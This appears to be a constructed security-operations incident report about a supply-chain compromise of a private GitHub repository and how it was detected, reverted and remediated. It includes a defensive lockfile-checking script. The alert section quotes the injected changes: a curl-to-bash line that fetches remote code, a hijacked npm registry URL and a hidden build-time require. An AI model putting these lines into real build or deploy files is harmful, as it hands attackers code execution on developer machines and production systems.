GitHub Alert Details
Alert ID: GITHUB-SUPPLY-CHAIN-7842
Alert Time: 2024-02-12 10:45:22 EST
Severity: CRITICAL (95/100)
Source: GitHub Advanced Security
Rule: “Compromised Maintainer Account – Malicious Commit”
MITRE ATT&CK: T1195 – Supply Chain Compromise
Alert Details:
Repository: company/internal-toolkit (Private)
Action: Malicious commit detected
Commit Details:
– Commit Hash: 8f7e6d5c4b3a2a1b9c8d7e6f5a4b3c2d1e0f9a8b
– Author: “jsmith” (John Smith – Legitimate maintainer)
– Time: 2024-02-12 10:30 EST
– Branch: main
– Files Modified: package-lock.json, build.js, deploy.sh
Suspicious Changes:
1. package-lock.json:
– Dependency entry, version unchanged: “lodash@4.17.21” → “lodash@4.17.21”
– BUT: Package registry URL changed to: http://185.143.221[.]89/npm/
– Dependency fetch now points to attacker-controlled registry
2. build.js:
– Added: require('./node_modules/.hidden/post-build.js')
– Hidden file downloads additional payload during build
3. deploy.sh:
– Added: curl -s http://194.165.16[.]89/update | bash
– Executes during deployment pipeline
Additional Context:
– Commit made from IP 45.134.225[.]78 (Netherlands)
– Legitimate maintainer jsmith is currently on vacation
– No other commits from this IP in history
– GitHub account may be compromised
SOC Investigation Process
Step | Action | Tools Used | Findings
1. Alert Validation | Verify GitHub Advanced Security alert | GitHub Security Tab | Confirmed malicious commit from maintainer account
2. Account Verification | Contact maintainer | Phone, Teams | jsmith confirmed on vacation; did not make commit
3. Immediate Action | Revert malicious commit | GitHub, Git Revert | Commit reverted; branch protected
4. Account Remediation | Secure compromised account | GitHub, Okta | Password reset; MFA enforced; sessions revoked
5. Build Pipeline Check | Verify no compromised builds | Jenkins, CI/CD Logs | No builds ran between commit and revert
6. Dependency Audit | Check for compromised dependencies | Snyk, Dependabot | No malicious packages downloaded
7. IOC Distribution | Block malicious infrastructure | Palo Alto, Cisco Umbrella | IPs/URLs added to blocklists
Jira Incident Report
Ticket: SOC-2024-063
Summary: T1195 – Supply Chain Compromise via Compromised GitHub Maintainer
Status: RESOLVED
Resolution: MALICIOUS – Commit Reverted
Priority: P1 – CRITICAL
Labels: T1195, supply-chain, github, compromised-account, code-injection, devsecops
Components: Software-Supply-Chain, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: GitHub Advanced Security.
Alert: “Compromised Maintainer Account – Malicious Commit”.
Repository: company/internal-toolkit (private).
Maintainer: jsmith (John Smith).
Time: 2024-02-12 10:45 EST.
Technique: MITRE ATT&CK T1195 – Supply Chain Compromise.
2. Technical Analysis:
Compromise Details:
Attack Vector: GitHub account jsmith compromised via credential stuffing (password reused from personal breach).
Attacker IP: 45.134.225[.]78 (Netherlands)
Commit Time: 2024-02-12 10:30 EST
Dwell Time: 15 minutes until detection
Malicious Changes:
1. package-lock.json – Registry Hijacking:
Changed npm registry URL to attacker-controlled server
Any future npm install would fetch malicious packages
Affects all developers and CI/CD builds
2. build.js – Hidden Backdoor:
Added reference to .hidden/post-build.js
File not in commit; would be downloaded during build
Post-build script would execute with build privileges
3. deploy.sh – Remote Execution:
Added curl command to download and execute script
Would run during deployment to production
Provides persistent access
Attacker Capabilities Gained:
Access to internal toolkit repository
Ability to inject code into build/deploy pipeline
Potential to compromise all developers (via npm)
Potential to compromise production (via deploy.sh)
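As an added illustration (not part of the original report), the kind of lockfile check the Dependency Audit step performs: it parses package-lock.json and flags every entry whose resolved URL is not HTTPS to an allowlisted registry host, or that has no integrity hash. The allowlist, the sample lockfile and the function name are constructed for this example; the registry address in the sample mirrors the one in the alert.

```python
import json
from urllib.parse import urlparse

# Registries the organisation trusts (assumption for this example).
ALLOWED_REGISTRY_HOSTS = {"registry.npmjs.org"}


def check_lockfile(lock_text, allowed_hosts=ALLOWED_REGISTRY_HOSTS):
    """Return (package, reason) findings for package-lock.json entries whose
    'resolved' URL is not HTTPS to an allowed host, or that lack 'integrity'."""
    lock = json.loads(lock_text)
    findings = []
    # lockfileVersion 2/3 keeps entries under "packages"; v1 used
    # "dependencies" (top-level entries only are checked here).
    entries = lock.get("packages") or lock.get("dependencies") or {}
    for path, meta in entries.items():
        if not path:  # the root project entry has an empty key in v2/v3
            continue
        resolved = meta.get("resolved")
        if not resolved:
            continue
        url = urlparse(resolved)
        if url.scheme != "https":
            findings.append((path, f"non-HTTPS registry URL: {resolved}"))
        if url.hostname not in allowed_hosts:
            findings.append((path, f"unexpected registry host: {url.hostname}"))
        if not meta.get("integrity"):
            findings.append((path, "missing integrity hash"))
    return findings


# Constructed sample mirroring the alert: lodash version unchanged, but its
# resolved URL now points at the registry address named in the alert.
SAMPLE_LOCK = json.dumps({
    "name": "internal-toolkit",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "internal-toolkit", "dependencies": {"lodash": "4.17.21"}},
        "node_modules/lodash": {
            "version": "4.17.21",
            "resolved": "http://185.143.221.89/npm/lodash/-/lodash-4.17.21.tgz",
            "integrity": "sha512-PLACEHOLDER",
        },
        "node_modules/ms": {
            "version": "2.1.3",
            "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz",
            "integrity": "sha512-PLACEHOLDER",
        },
    },
})

if __name__ == "__main__":
    for pkg, reason in check_lockfile(SAMPLE_LOCK):
        print(f"{pkg}: {reason}")
```

Run as a pre-merge or CI step, any non-empty result fails the build before npm install can contact the unexpected registry.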
3. Investigation Findings:
Timeline:
10:30 – Malicious commit made from Netherlands IP
10:32 – GitHub Advanced Security detects anomaly
10:45 – SOC alert generated
10:47 – Investigation begins
10:48 – jsmith contacted (on vacation)
10:50 – Commit reverted
10:52 – jsmith account secured
10:55 – CI/CD pipelines verified (no builds)
Account Compromise Analysis:
jsmith used same password on personal GitHub (breached)
No MFA on GitHub account (now enforced)
No 2FA on personal email (attack vector)
Impact Assessment:
No builds ran during 22-minute window
No developers ran npm install after malicious commit
No production deployments affected
Repository history cleaned
4. Containment Actions:
Immediate Actions (10:47-10:55 EST):
Reverted malicious commit.
Protected main branch (require PR + approval).
Reset jsmith’s GitHub password.
Enforced MFA on GitHub account.
Revoked all active sessions.
Pipeline Verification:
Checked Jenkins build logs (no builds during window).
Verified npm cache (no external downloads).
Audited dependency tree (clean).
Infrastructure Blocking:
Added IPs 45.134.225[.]78, 185.143.221[.]89, 194.165.16[.]89 to blocklists.
Added malicious domains to DNS filter.
5. Root Cause Analysis:
Primary Cause: Compromised GitHub maintainer account via credential reuse.
Contributing Factors:
No MFA on GitHub account.
Password reused from personal breach.
No branch protection requiring PRs.
No code review for direct commits.
6. Business Impact:
Operational Impact: None (caught before impact).
Supply Chain Risk: HIGH – Potential to compromise all developers.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious commit reverted.
Account secured with MFA.
Branch protection enabled.
IOCs blocked.
Technical Controls Enhanced:
Enforced MFA for all GitHub accounts.
Enabled GitHub Advanced Security for all repos.
Implemented branch protection rules (require PR, approvals).
Deployed dependency scanning (Snyk, Dependabot).
Created incident response playbook for supply chain attacks.
8. Conclusion:
This incident involved a sophisticated supply chain attack via a compromised GitHub maintainer account. The attacker injected malicious code that would have compromised the build and deployment pipeline. Rapid detection and response prevented any impact.
Closure Rationale: Malicious commit reverted; account secured; enhanced controls implemented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-12 12:00 EST